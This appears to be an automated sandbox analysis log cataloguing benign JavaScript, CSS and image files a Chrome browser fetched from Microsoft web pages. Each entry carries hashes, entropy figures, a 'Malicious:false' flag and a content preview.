                                                                                                                      SHA-512:B2CD1CFD5711BDF37C435EF0E6764C28A233184CE6BA3AE097441FE2A020B6E172E6DB335F4266DDC98788E86C0CF2145E5B09A125FFA4C166AFCA99DCF2004E
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/areaheading/v1/areaheading/clientlibs/site.min.ACSHASH6fc8affca0d3b2c5bdc78e27c9425bce.js
                                                                                                                      Preview:'use strict';(()=>{function c(b){var a=e[b];if(void 0!==a)return a.exports;a=e[b]={exports:{}};return f[b](a,a.exports,c),a.exports}var f={6993:()=>{$(function(){$(".area-heading p a").each(function(b,a){b=$(a).closest("div.row").find("h1,h2,h3,h4,h5,h6");a.dataset.biCn=a.innerText;a.dataset.biEcn=a.innerText;a.dataset.biCompnm="Area Heading";a.dataset.biBhvr="0";a.dataset.biCt="Link";a.dataset.biPa="Body";b=b.first();b.text()&&""!==b.text()&&(a.dataset.biHn=b.text().trim(),a.dataset.biEhn=b.text().trim())});.document.querySelectorAll(".areaheading sup").forEach(function(b){0==b.children.length&&b.insertAdjacentHTML("afterbegin",'\x3cspan class\x3d"sr-text"\x3eFootnote\x3c/span\x3e')})})}},e={};c.n=b=>{var a=b&&b.__esModule?()=>b.default:()=>b;return c.d(a,{a}),a};c.d=(b,a)=>{for(var d in a)c.o(a,d)&&!c.o(b,d)&&Object.defineProperty(b,d,{enumerable:!0,get:a[d]})};c.o=(b,a)=>Object.prototype.hasOwnProperty.call(b,a);c(6993)})();
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (10933)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):10978
                                                                                                                      Entropy (8bit):5.113898622156223
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:fhsrAxRhWsJlXOeZTxB2Q3os25mPZT8u4wtVVAkhSOWzaVBmdcYZ:lJlvZTjv3os25mPF4wtbAkhSOWmjQc8
                                                                                                                      MD5:81C98606FDCF5261F4626856A3A920A6
                                                                                                                      SHA1:535E11D6D16FFC17316EFB6B1EA553335DE5F2A0
                                                                                                                      SHA-256:6D774AED5BE6E9D53DB8DF5432FB7E6642E90BB1315F49E63FE6FF4340ECC156
                                                                                                                      SHA-512:EE28BED0C8E277EDDECF0055AA8D3BF1FCE966E5352F2401C7E587487029282CDF9EBEAA6B1611992F4A331029EF708876331244C4A395047756D7F526F4C653
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/js/Article.Main.min.js?v=bXdK7Vvm6dU9uN9UMvt-ZkLpC7ExX0nmP-b_Q0DswVY
                                                                                                                      Preview:!function(){"use strict";var t="click",e="ocHidden",n="supCardControlCarouselDisabledButton",o=".supCardControlCarouselPrevButton",i=".supCardControlCarouselNextButton",r="".concat(o,", ").concat(i);function a(t,e){$(t).children(r).toggleClass(n,!e)}var s=".supCardControlContainer",l=".supCardControlCard",c=".heroCardControlCard";function u(){var t=this.querySelector("div.videoContainer");if(t){var e=t.querySelector("div.supCardControlImageContainer");e&&e.addEventListener("click",(function(){var e=t.querySelector("div.cardControlCarouselVideoArea");if(e){var n=e.querySelector("universal-media-player");n&&(e.removeAttribute("hidden"),n.play())}}))}}function d(t){$(t).on("setPosition",(function(t,e){var n,o=e.$dots;(null===(n=e.options)||void 0===n?void 0:n.slidesToShow)<e.slideCount?o.show():o.hide()}))}function h(t,e){t&&(t.style.backgroundImage=""===e?"none":"url(".concat(e,")"),t.classList.add("heroCarouselSection"))}function f(t,e,n){var o=t.find(n);if(o.length){var i="focus"===e.t
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65398)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):149977
                                                                                                                      Entropy (8bit):5.425465014322962
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:ds2R7b4i2VvQ8jDNbSDU6ez/4/fOmToUJdupe:dvJ26Dkw/LT9JduY
                                                                                                                      MD5:107489D1ED6BE77BFD69EBE4D7B52B6D
                                                                                                                      SHA1:FD56DF206A1DD0223D6D18ADAC841582282A346E
                                                                                                                      SHA-256:3BBC0000E28054DDBE38B2E7A21DCA8D66FDA56EA48448BCE4658BC6B518A970
                                                                                                                      SHA-512:51C5F6D9D7D10D06777ADE20C7E63CBFA354B830B68D32FEDE4B93C15D80873C501C0CCC4D006FD58C639662D2DCBBA193B61427D30F8938EDA4B9049743BC65
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/lib/oneds/dist/ms.analytics-web-4.0.2.min.js?v=O7wAAOKAVN2-OLLnoh3KjWb9pW6khEi85GWLxrUYqXA
                                                                                                                      Preview:/*!. * 1DS JS SDK Analytics Web, 4.0.2. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,n){var t="undefined";if("object"==typeof exports&&typeof module!=t)n(exports);else if("function"==typeof define&&define.amd)define(["exports"],n);else{var r,i,e=typeof globalThis!=t?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_analytics_web_4_0_2={},s="4.0.2",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},g=e.v=e.v||[],l=d[o]=d[o]||{},p=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),n(a),a)r="x",f[i]=a[i],g[i]=s,typeof d[i]==t?(r="n",(d[i]=a[i])&&(p[i]=s)):p[i]||(p[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(t){"use strict";var o="object",ye="undefined",c="prototype",u=Object,s=u[c],$=undefined,y=null,l="",f="boolean",d="function",g="number",v="object",m="prototype",T="__proto__",b="string",I="undefined",C="constructor",N="Symbol",S="_polyfill",w="indexOf",P="length",A="done",_="value",D="name",O="sl
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65398)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):149977
                                                                                                                      Entropy (8bit):5.425465014322962
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:ds2R7b4i2VvQ8jDNbSDU6ez/4/fOmToUJdupe:dvJ26Dkw/LT9JduY
                                                                                                                      MD5:107489D1ED6BE77BFD69EBE4D7B52B6D
                                                                                                                      SHA1:FD56DF206A1DD0223D6D18ADAC841582282A346E
                                                                                                                      SHA-256:3BBC0000E28054DDBE38B2E7A21DCA8D66FDA56EA48448BCE4658BC6B518A970
                                                                                                                      SHA-512:51C5F6D9D7D10D06777ADE20C7E63CBFA354B830B68D32FEDE4B93C15D80873C501C0CCC4D006FD58C639662D2DCBBA193B61427D30F8938EDA4B9049743BC65
                                                                                                                      Malicious:false
                                                                                                                      Preview:/*!. * 1DS JS SDK Analytics Web, 4.0.2. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,n){var t="undefined";if("object"==typeof exports&&typeof module!=t)n(exports);else if("function"==typeof define&&define.amd)define(["exports"],n);else{var r,i,e=typeof globalThis!=t?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_analytics_web_4_0_2={},s="4.0.2",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},g=e.v=e.v||[],l=d[o]=d[o]||{},p=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),n(a),a)r="x",f[i]=a[i],g[i]=s,typeof d[i]==t?(r="n",(d[i]=a[i])&&(p[i]=s)):p[i]||(p[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(t){"use strict";var o="object",ye="undefined",c="prototype",u=Object,s=u[c],$=undefined,y=null,l="",f="boolean",d="function",g="number",v="object",m="prototype",T="__proto__",b="string",I="undefined",C="constructor",N="Symbol",S="_polyfill",w="indexOf",P="length",A="done",_="value",D="name",O="sl
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (3164)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):34401
                                                                                                                      Entropy (8bit):5.567515913811421
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:xluaIaJW9ePBW/YfKbNckc0OFc0hLoSIbSZdfKGnRmSdgSJnsYXZeTnOki:XuioyA/7c0opLozb6RmCg6kTG
                                                                                                                      MD5:5EE9E4E4E0A5FD39092E63D2D102B12B
                                                                                                                      SHA1:1B66C81BD03006B327228854327C0FD3DF434BC2
                                                                                                                      SHA-256:441B9F212CD322C6B039A2691F999EB2FAFC10FD645BCDB043A6DEE2DD052DA7
                                                                                                                      SHA-512:3CA07A5D89931BCF6F0294C0727020A7FFE663487DB6ECC309FF69DDF59A0490BF85395E91241D40ED1DCF157C0784E6D6B53D8C92D52ED05823CCB6FBE1C470
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/clientlibs/clientlib-httpclient.min.ACSHASH5ee9e4e4e0a5fd39092e63d2d102b12b.js
                                                                                                                      Preview:'use strict';(()=>{function L(n){var r=T[n];if(void 0!==r)return r.exports;r=T[n]={exports:{}};return U[n](r,r.exports,L),r.exports}var U={3770:(n,r,h)=>{n.exports=h(2494).default},2494:(n,r,h)=>{function f(x){return!x.response&&!!x.code&&"ECONNABORTED"!==x.code&&(0,a.default)(x)}function g(x){return"ECONNABORTED"!==x.code&&(!x.response||500<=x.response.status&&599>=x.response.status)}function p(x){return!!x.config&&g(x)&&-1!==t.indexOf(x.config.method)}function m(x){return f(x)||p(x)}function k(){return 0}.function l(x){var H=x[A]||{};return H.retryCount=H.retryCount||0,x[A]=H,H}function u(x,H){x.interceptors.request.use(function(E){return l(E).lastRequestTime=Date.now(),E});x.interceptors.response.use(null,function(E){var v=E.config;if(!v)return Promise.reject(E);var I=Object.assign({},H,v[A]),P=I.retries;P=void 0===P?3:P;var J=I.retryCondition;J=void 0===J?m:J;var M=I.retryDelay;M=void 0===M?k:M;I=I.shouldResetTimeout;I=void 0!==I&&I;var Q=l(v);if(J(E)&&Q.retryCount<P){Q.retryCount+
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (45900)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):45963
                                                                                                                      Entropy (8bit):5.396725281317118
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:H/eCtKv79zpXXfoJLjtK8Dx1DieS3i8eqUvdX:W/vXQJJDD27W
                                                                                                                      MD5:F00CFBA8F9859DFEFDFE90EA520C6FCF
                                                                                                                      SHA1:B32E153588A287DE81050E327EB5BD7A90B04D99
                                                                                                                      SHA-256:977CC9882BA50763333DF64E98D26BC3C60A15D6EFA4A2C1FE70579985EDDF84
                                                                                                                      SHA-512:DA51FAB6D6A6B05A1730FB97656A496870FE1248616BC3F9DDBE101D1C189B6BEC7CAF63976418F88843AFA64763D25542787116FFE0E43E35BF3DCE61914DAB
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/js/SilentSignInManager.Main.min.js?v=l3zJiCulB2MzPfZOmNJrw8YKFdbvpKLB_nBXmYXt34Q
                                                                                                                      Preview:!function(){var t={8488:function(t,e,n){var r=n(2746);t.exports=r},3104:function(t,e,n){var r=n(7273);t.exports=r},6564:function(t,e,n){var r=n(2445),o=n(3478),i=n(7269),a=r.TypeError;t.exports=function(t){if(o(t))return t;throw a(i(t)+" is not a function")}},5719:function(t,e,n){var r=n(2445),o=n(3478),i=r.String,a=r.TypeError;t.exports=function(t){if("object"==typeof t||o(t))return t;throw a("Can't set "+i(t)+" as a prototype")}},1313:function(t,e,n){var r=n(4486),o=n(6635),i=n(9783),a=r("unscopables"),u=Array.prototype;null==u[a]&&i.f(u,a,{configurable:!0,value:o(null)}),t.exports=function(t){u[a][t]=!0}},3855:function(t,e,n){var r=n(2445),o=n(7455),i=r.TypeError;t.exports=function(t,e){if(o(e,t))return t;throw i("Incorrect invocation")}},4482:function(t,e,n){var r=n(2445),o=n(3406),i=r.String,a=r.TypeError;t.exports=function(t){if(o(t))return t;throw a(i(t)+" is not an object")}},3410:function(t,e,n){"use strict";var r=n(2445),o=n(6981),i=n(5633),a=n(2048),u=n(7065),s=n(1977),c=n(9
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 594 x 332, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):17028
                                                                                                                      Entropy (8bit):7.926562320564401
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:7wixC+iG9rj5+kgbLPcAmxOkpJIhI9CvaMo05vCf9MRRLMk5K/jk:sifiG2tvXmxHbIhlo05KlGRaY
                                                                                                                      MD5:DDCB4FCA39CCADCDF6C1FE2E1F717867
                                                                                                                      SHA1:88238D53920F32AF37A802A5E6BFEEC3B1E6F75D
                                                                                                                      SHA-256:097DF2DFA3781F1AEDB631C968D04D8152D7C7FA8E92BC91E233B3000E2F34BB
                                                                                                                      SHA-512:316574E565EF67B97E13D0BF01CF4AFA8E0E9CF0748768CE4AE6BBB81352685A6E027EADBC083D2B632C412C950E65963E6EA98FE4CE7692C0AE0B6D956D3D37
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.content.office.net/en-us/media/a9241eee-a729-4513-97b4-5b87c381c21b.png
                                                                                                                      Preview:.PNG........IHDR...R...L.......R.....pHYs...%...%.IR$.....sRGB.........gAMA......a...B.IDATx..Y.mWU.W.7.A.e.Z..H.R.F.......$!....iH..4...T@..{i.A.....M..... .XP6eaB..R% ...Bs.o.0N..w...Zkvk..j.>g.}.^...c.1O...?..K.I'..J..<.c..fX!..N.m5...!.O-.=....p/....B.m_..o..........7.{..............]..~...C.....J..g..*bI.C.....@&.7.}...u.RYs.J_.P_..j.....J...%..}.{..)}o,....|...2iil+1.n:.W.b.I@. ......q/........},...K.....b.35f.....@t.C.H..f.....X8...qXA5W\m*G..78..E.Wjm..j.C.E.....L.!e...}..... .FKi......!........t.;.s:8.P....9...H@....I! ...lp....`...".#.... .d"......=eN.nNcMUu......=.l......a.@...KY...^.....D..........=..<%&..}...P.HK.CE...0...R1..r..#h.5...)....z.B.....7.DH....KE...ha)....Z.=........)b*ZH.X.._...)........HK.a.Pn.X1Eh.....o.B......k...2....`..v.O.=...]..Y.!..:R.:......G*@jg.q.[b.....)].O.....jm...q.c..*...=B...|.........%....x.Bc..[.....r.....4......R.}......R...6.I..W..!...8K...:..U.. .3ZH...t.e..f\.(...y>k+.AH"..K.GjI!....J.}...HK..&..%.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (309), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):309
                                                                                                                      Entropy (8bit):4.971196656935236
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:QuVtCiR2cIT53AM+64uT7nadCkq9KwhA6ONHSInadLb1wnzjCY1ee:jVtCyB4w1cWdYpAfVSVdLa8e
                                                                                                                      MD5:D7106DB242C2B41F88A1B02418BEC7E2
                                                                                                                      SHA1:7A445118F0B5712744AA4AED6889B28C1E7779F7
                                                                                                                      SHA-256:044527A735B287BD84D2AE6D2D3B89C85B52C9750BB07E5AEF19FB8F28F0442B
                                                                                                                      SHA-512:C493FBD6926006108E56E23BB204BFE59A7364ED6D2409B5B258D9EA6C060259E13A7E7A22021607F6EDD55EEA52C75DFE7FCF18BB76D6E539FBD763BF399185
                                                                                                                      Malicious:false
                                                                                                                      Preview:'use strict';var DynamicClientSideScriptHandler=function(){return{fetchScriptLink:function(b){var a=(a=document.querySelector('div[data-identifier\x3d"'+b+'"]'))?a.getAttribute("data-content"):null;null===a&&(a=(b=document.querySelector('meta[name\x3d"'+b+'"]'))?b.getAttribute("content"):null);return a}}}();
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):159
                                                                                                                      Entropy (8bit):4.661188988961239
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:agWqLss4aXD5R20gJYRnd7HtOx1L5HQhLIzseX5LxfYLk21:QqPXD5bDRd7H8L5whLzeJSI21
                                                                                                                      MD5:C22EA5B46F3FCAD90DA0ABCC0A3F73D4
                                                                                                                      SHA1:2DB789C63AFB63D98932D7B55907DC3508E318B4
                                                                                                                      SHA-256:8334DAA260516BB896407461E5F10E8E3041B06C56846BBB9D3435C6E77513AD
                                                                                                                      SHA-512:A0359F8C25DC40CEFFD14A41BA81794717B99DABE78CBF8A8678F3E3EC57F317388CA0DC55B1CC6AD2D6C13D2B3CAEB5A64527BB2C646ED2D93775437DA646F1
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/structure/page/clientlibs/featurecontrol.min.ACSHASHc22ea5b46f3fcad90da0abcc0a3f73d4.js
                                                                                                                      Preview:'use strict';function isFeatureEnabled(b){var a=document.getElementById("customFeatureControl").getAttribute("enabledFeatures");return null!=a&&a.includes(b)};
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (512)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):544
                                                                                                                      Entropy (8bit):5.221040627274746
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:Yz+uu8HDeNucEuKEZEuwdaXOVWMsk2lntX2F3/v2d7oyxCJNe:YauZStKa5nltX2Fvege
                                                                                                                      MD5:383B23D12DF0D9265D7569A7102C2F96
                                                                                                                      SHA1:B78FB17F58484F5CD29B3FE307936181E1B30B57
                                                                                                                      SHA-256:BBF608E321107D6C4EEAF31A4A0EEB9DD8A9AB825F645FA963651688FD3D3914
                                                                                                                      SHA-512:8CA27D482871CAFF41C2D86CA743F075ED97465C12624B1841396B423229A90AFB7E62211BB02DFC0211C45BBABFD12F82EFF8863E6FD3D176FCD99C84747F60
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-greenid.min.ACSHASH383b23d12df0d9265d7569a7102c2f96.js
                                                                                                                      Preview:'use strict';(function(){(function(b){var a=document.createElement("iframe");a.setAttribute("src","https://fpt.microsoft.com/tags?session_id\x3d"+b);a.style.width="100px";a.style.height="100px";a.style.cssText="display: none; color: rgb(0,0,0); float:left; position:absolute; top:-200px; left:-200px; border:0px";a.title="greenID";a.setAttribute("id","greenID");document.body.append(a)})(function(){return"10000000-1000-4000-8000-100000000000".replace(/[018]/g,b=>(b^crypto.getRandomValues(new Uint8Array(1))[0]&.15>>b/4).toString(16))}())})();
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 100x100, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):2832
                                                                                                                      Entropy (8bit):7.92569260000134
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:5vgIfLwwvMw0oRW3lJOef6SE771axbtO4SSlPuVmcW3lIMJUCfVA2WNwfUFzzrPL:mIfL7v0oRWHOUEn1aH/Ll5h3KMJUcjWN
                                                                                                                      MD5:9F25C34D443324665BB679F0C9716FF0
                                                                                                                      SHA1:6224748E3C5968F23CF4717A3FFDB797A609DBAA
                                                                                                                      SHA-256:65CBC7C735A938DCD2F8C5F74090229DF93E974613E757B0920F63DAEF5E2989
                                                                                                                      SHA-512:BCAC42EBEE72C4443E7BCAAF10F94A02F17F0B2E7560EF766A41B808FD9E5BDA55871C92001C6A04B39CF0EF46958A0DE6DC981D8A8B5E3170E32230A7233FF4
                                                                                                                      Malicious:false
                                                                                                                      URL:https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Icon_NewsSocial_68x68?scl=1
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (590)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1716
                                                                                                                      Entropy (8bit):5.2304068952006615
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:4435HDQ258U3JqVnCG/6YyTrkzRLj9tSRAE9P:hU25ZqVC6ByTrWRLjSRAE9P
                                                                                                                      MD5:4CFFC2C9B55F8BDE649E0D2535A1EEBD
                                                                                                                      SHA1:2AAF4DF1E02ED4F5BB48F00A7423F748BF544E0C
                                                                                                                      SHA-256:7BB50A050792F761855CC330E0248D037B37DD68FD23FBB7DB8A7E8694F50A94
                                                                                                                      SHA-512:599C87219B7E264CFF8E6951192C691E26DFFA88EFC607EDFE9205F1BB08DA28FD61B508FAE93652BE36BE1ADA57E50661490925B247A43C3EB7F24D8CA0C8D0
                                                                                                                      Malicious:false
                                                                                                                      Preview:'use strict';var experimentationAnalytics=function(){function g(a){return a&&0<a.length?!1:!0}function m(a){return Object.keys(a).map(function(b){return b+""+a[b]}).join("")}function n(a){var b=a.reduce(function(c,e){c[m(e)]=e;return c},{});return Object.keys(b).map(function(c){return b[c]})}function h(a){console.log("sendToVortex Call");a&&a.analytics&&f(a)}function k(a){return{actionType:"A",behavior:"12",content:JSON.stringify({}),pageTags:{tnta:a&&a.analytics?a.analytics.tnta:""}}}function l(a,.b){return{actionType:"A",behavior:"12",content:JSON.stringify({}),pageTags:{tnta:"",at_activity_name:a&&a.responseTokens[b]?a.responseTokens[b]["activity.name"]:"",at_exp_name:a&&a.responseTokens[b]?a.responseTokens[b]["experience.name"]:"",at_activity_id:a&&a.responseTokens[b]?a.responseTokens[b]["activity.id"]:"",at_exp_id:a&&a.responseTokens[b]?a.responseTokens[b]["experience.id"]:""}}}function f(a,b,c){b="number"===typeof b?b:25;c="number"===typeof c?c:200;var e=0;if(window.expAnalytics&
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):275
                                                                                                                      Entropy (8bit):4.714732721492951
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:DpAD0PVVdEkVaMJKrxKTyRNBVaMJKrhfQflfCGKTyRNhJ:yAthTJKcTaTJKlfQfFSTU
                                                                                                                      MD5:6F506B608145FDF960C714FFC7198C16
                                                                                                                      SHA1:BF71B0D1729D7D12ECD8DEB24C83B7B5ABC4F5EB
                                                                                                                      SHA-256:2992C4F04057594405C063FE0A461E0101AFEB85330BFCF564FCE3D773D4A572
                                                                                                                      SHA-512:1DB30D98BFA8BC70C94C44C0D10080536BA4BADA854207E236263D24329E95F857B93874A638850107EC0E4DC9C1F58DED791E2D94EE63F6FC969ED4D7D7295E
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/lists/link-list/v1/link-list/clientlibs/site.min.ACSHASH6f506b608145fdf960c714ffc7198c16.css
                                                                                                                      Preview:.popover-header-link-list{font-weight:600}..popover-cursor{cursor:pointer}.@media screen and (forced-colors:active){.link-list .img-fluid{filter:invert(1)}.}.@media screen and (forced-colors:active) and (prefers-color-scheme:light){.link-list .img-fluid{filter:invert(0.1)}.}
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (2230), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):2230
                                                                                                                      Entropy (8bit):5.1220413514345156
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:UhdH51FtNZlLC1hdGKhhHH1FtNHt1h9hKhZS7zJRLkVbS01S0hSjSTMJcUSjSLpY:Q//JLCFGeV/ttD7rAc0MP+QuD+LpY
                                                                                                                      MD5:4D56AF8ACF934242A6D0C2D5FD5785E1
                                                                                                                      SHA1:9D58373C57C53221C4762B87BDC186F6E38384D0
                                                                                                                      SHA-256:6F26F0CC605A8C789C557B2956CE78D147D5D2CC16D2F09B3A606306BCA3F4DE
                                                                                                                      SHA-512:1ECA9E9FEF9757337739BC530C87AAA8B9209A14C16F570FC8041618274330E3649F6D0A7E9FA97DC45DC8BB8FDE61A18E06F98E8A48E7BC5F22D4D53CC217A3
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/css/SearchBox/search-box.css?v=bybwzGBajHicVXspVs540UfV0swW0vCbOmBjBryj9N4
                                                                                                                      Preview:.searchBox .searchBoxForm{position:relative;margin:0}.searchBox .searchBoxForm .searchBoxInput{width:100%;height:3.1875rem;font-family:"Segoe UI","Segoe UI Web","wf_segoe-ui_normal","Helvetica Neue","BBAlpha Sans","S60 Sans",Arial,sans-serif;font-size:1rem;padding-left:1.125rem;padding-right:3.625rem;border:.0625rem solid #a3a3a3;border-radius:.125rem;box-sizing:border-box;outline:0}html[dir=rtl] .searchBox .searchBoxForm .searchBoxInput{padding-left:3.625rem;padding-right:1.125rem}.searchBox .searchBoxForm .searchBoxButton{position:absolute;font-family:"Segoe UI","Segoe UI Web","wf_segoe-ui_normal","Helvetica Neue","BBAlpha Sans","S60 Sans",Arial,sans-serif;cursor:pointer;padding:0 .25rem;top:0;right:0;width:3.125rem;height:3.1875rem;background-color:transparent;border:none}html[dir=rtl] .searchBox .searchBoxForm .searchBoxButton{left:0;right:auto;transform:scaleX(-1)}.searchBox .searchBoxForm .searchBoxButton .searchBoxIconContainer{display:flex;color:#0078d4;justify-content:center}.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):175
                                                                                                                      Entropy (8bit):4.68043398329258
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:agWqLs3KOBmKL8ELDSzEfYZBAeOE8c/yCN9xGV9LH1CNILWAcELDlpKOBmKL8ELQ:QqtgLSH9xGf1OILWAfkgXe
                                                                                                                      MD5:96F0C5B1219E39B8788028F5C17A5AD9
                                                                                                                      SHA1:D6DCE0DE065B0D13905EAEDA0BA5C0DEA3D8F67C
                                                                                                                      SHA-256:1FC2BCE2D46DF4565B8C488B22225CFE7ADB7C37CC9A542D4F85B61995B306CB
                                                                                                                      SHA-512:057810FA0558506C6B8ABECB1A7A58FF61DA0609B3A5798BB42DE3A9B801CA0D8B20C4C1F9A250EE33D30492452CC5C4553332B16300408AA0C45B1515D4AF10
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-cookieconsent.min.ACSHASH96f0c5b1219e39b8788028f5c17a5ad9.js
                                                                                                                      Preview:'use strict';function AEMOnCookieConsentChangedCallback(a){}if("undefined"!=typeof WcpConsent&&null!=WcpConsent)WcpConsent.onConsentChanged(AEMOnCookieConsentChangedCallback);
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (7862)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):129677
                                                                                                                      Entropy (8bit):5.330029900554168
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:BkDsmoyraxaOfNPN5/4OYQk9qNeUyMLBRMr:BkZX2xaw8
                                                                                                                      MD5:10908F1C465EEADC74B1C17C9515EB8A
                                                                                                                      SHA1:EAB69087F1E08128C3B08CE3AFB6E5980CBF058D
                                                                                                                      SHA-256:51F1F59783B1C7C3C9F4C892F629C6A9F801ECCFC2CEA0B1D6AB5A1DC685DD03
                                                                                                                      SHA-512:55CF4EFB3D2314CF1ECE48E9A146A40B6A884C66027FD19BDDC2BBCBCCBAAA0C07DF6AE7937DC1DD8783257B515ABF0B2CF84F2E0CDA4236FA92ED01A54FDDD1
                                                                                                                      Malicious:false
                                                                                                                      Preview:/*******************************************************************************. * Copyright 2017 Adobe. *. * Licensed under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License.. * You may obtain a copy of the License at. *. * http://www.apache.org/licenses/LICENSE-2.0. *. * Unless required by applicable law or agreed to in writing, software. * distributed under the License is distributed on an "AS IS" BASIS,. * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. * See the License for the specific language governing permissions and. * limitations under the License.. ******************************************************************************/.if (window.Element && !Element.prototype.closest) {. // eslint valid-jsdoc: "off". Element.prototype.closest =. function(s) {. "use strict";. var matches = (this.document || this.ownerDocument).querySelectorAll(s);.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):52717
                                                                                                                      Entropy (8bit):5.462668685745912
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                      MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                      SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                      SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                      SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                      Malicious:false
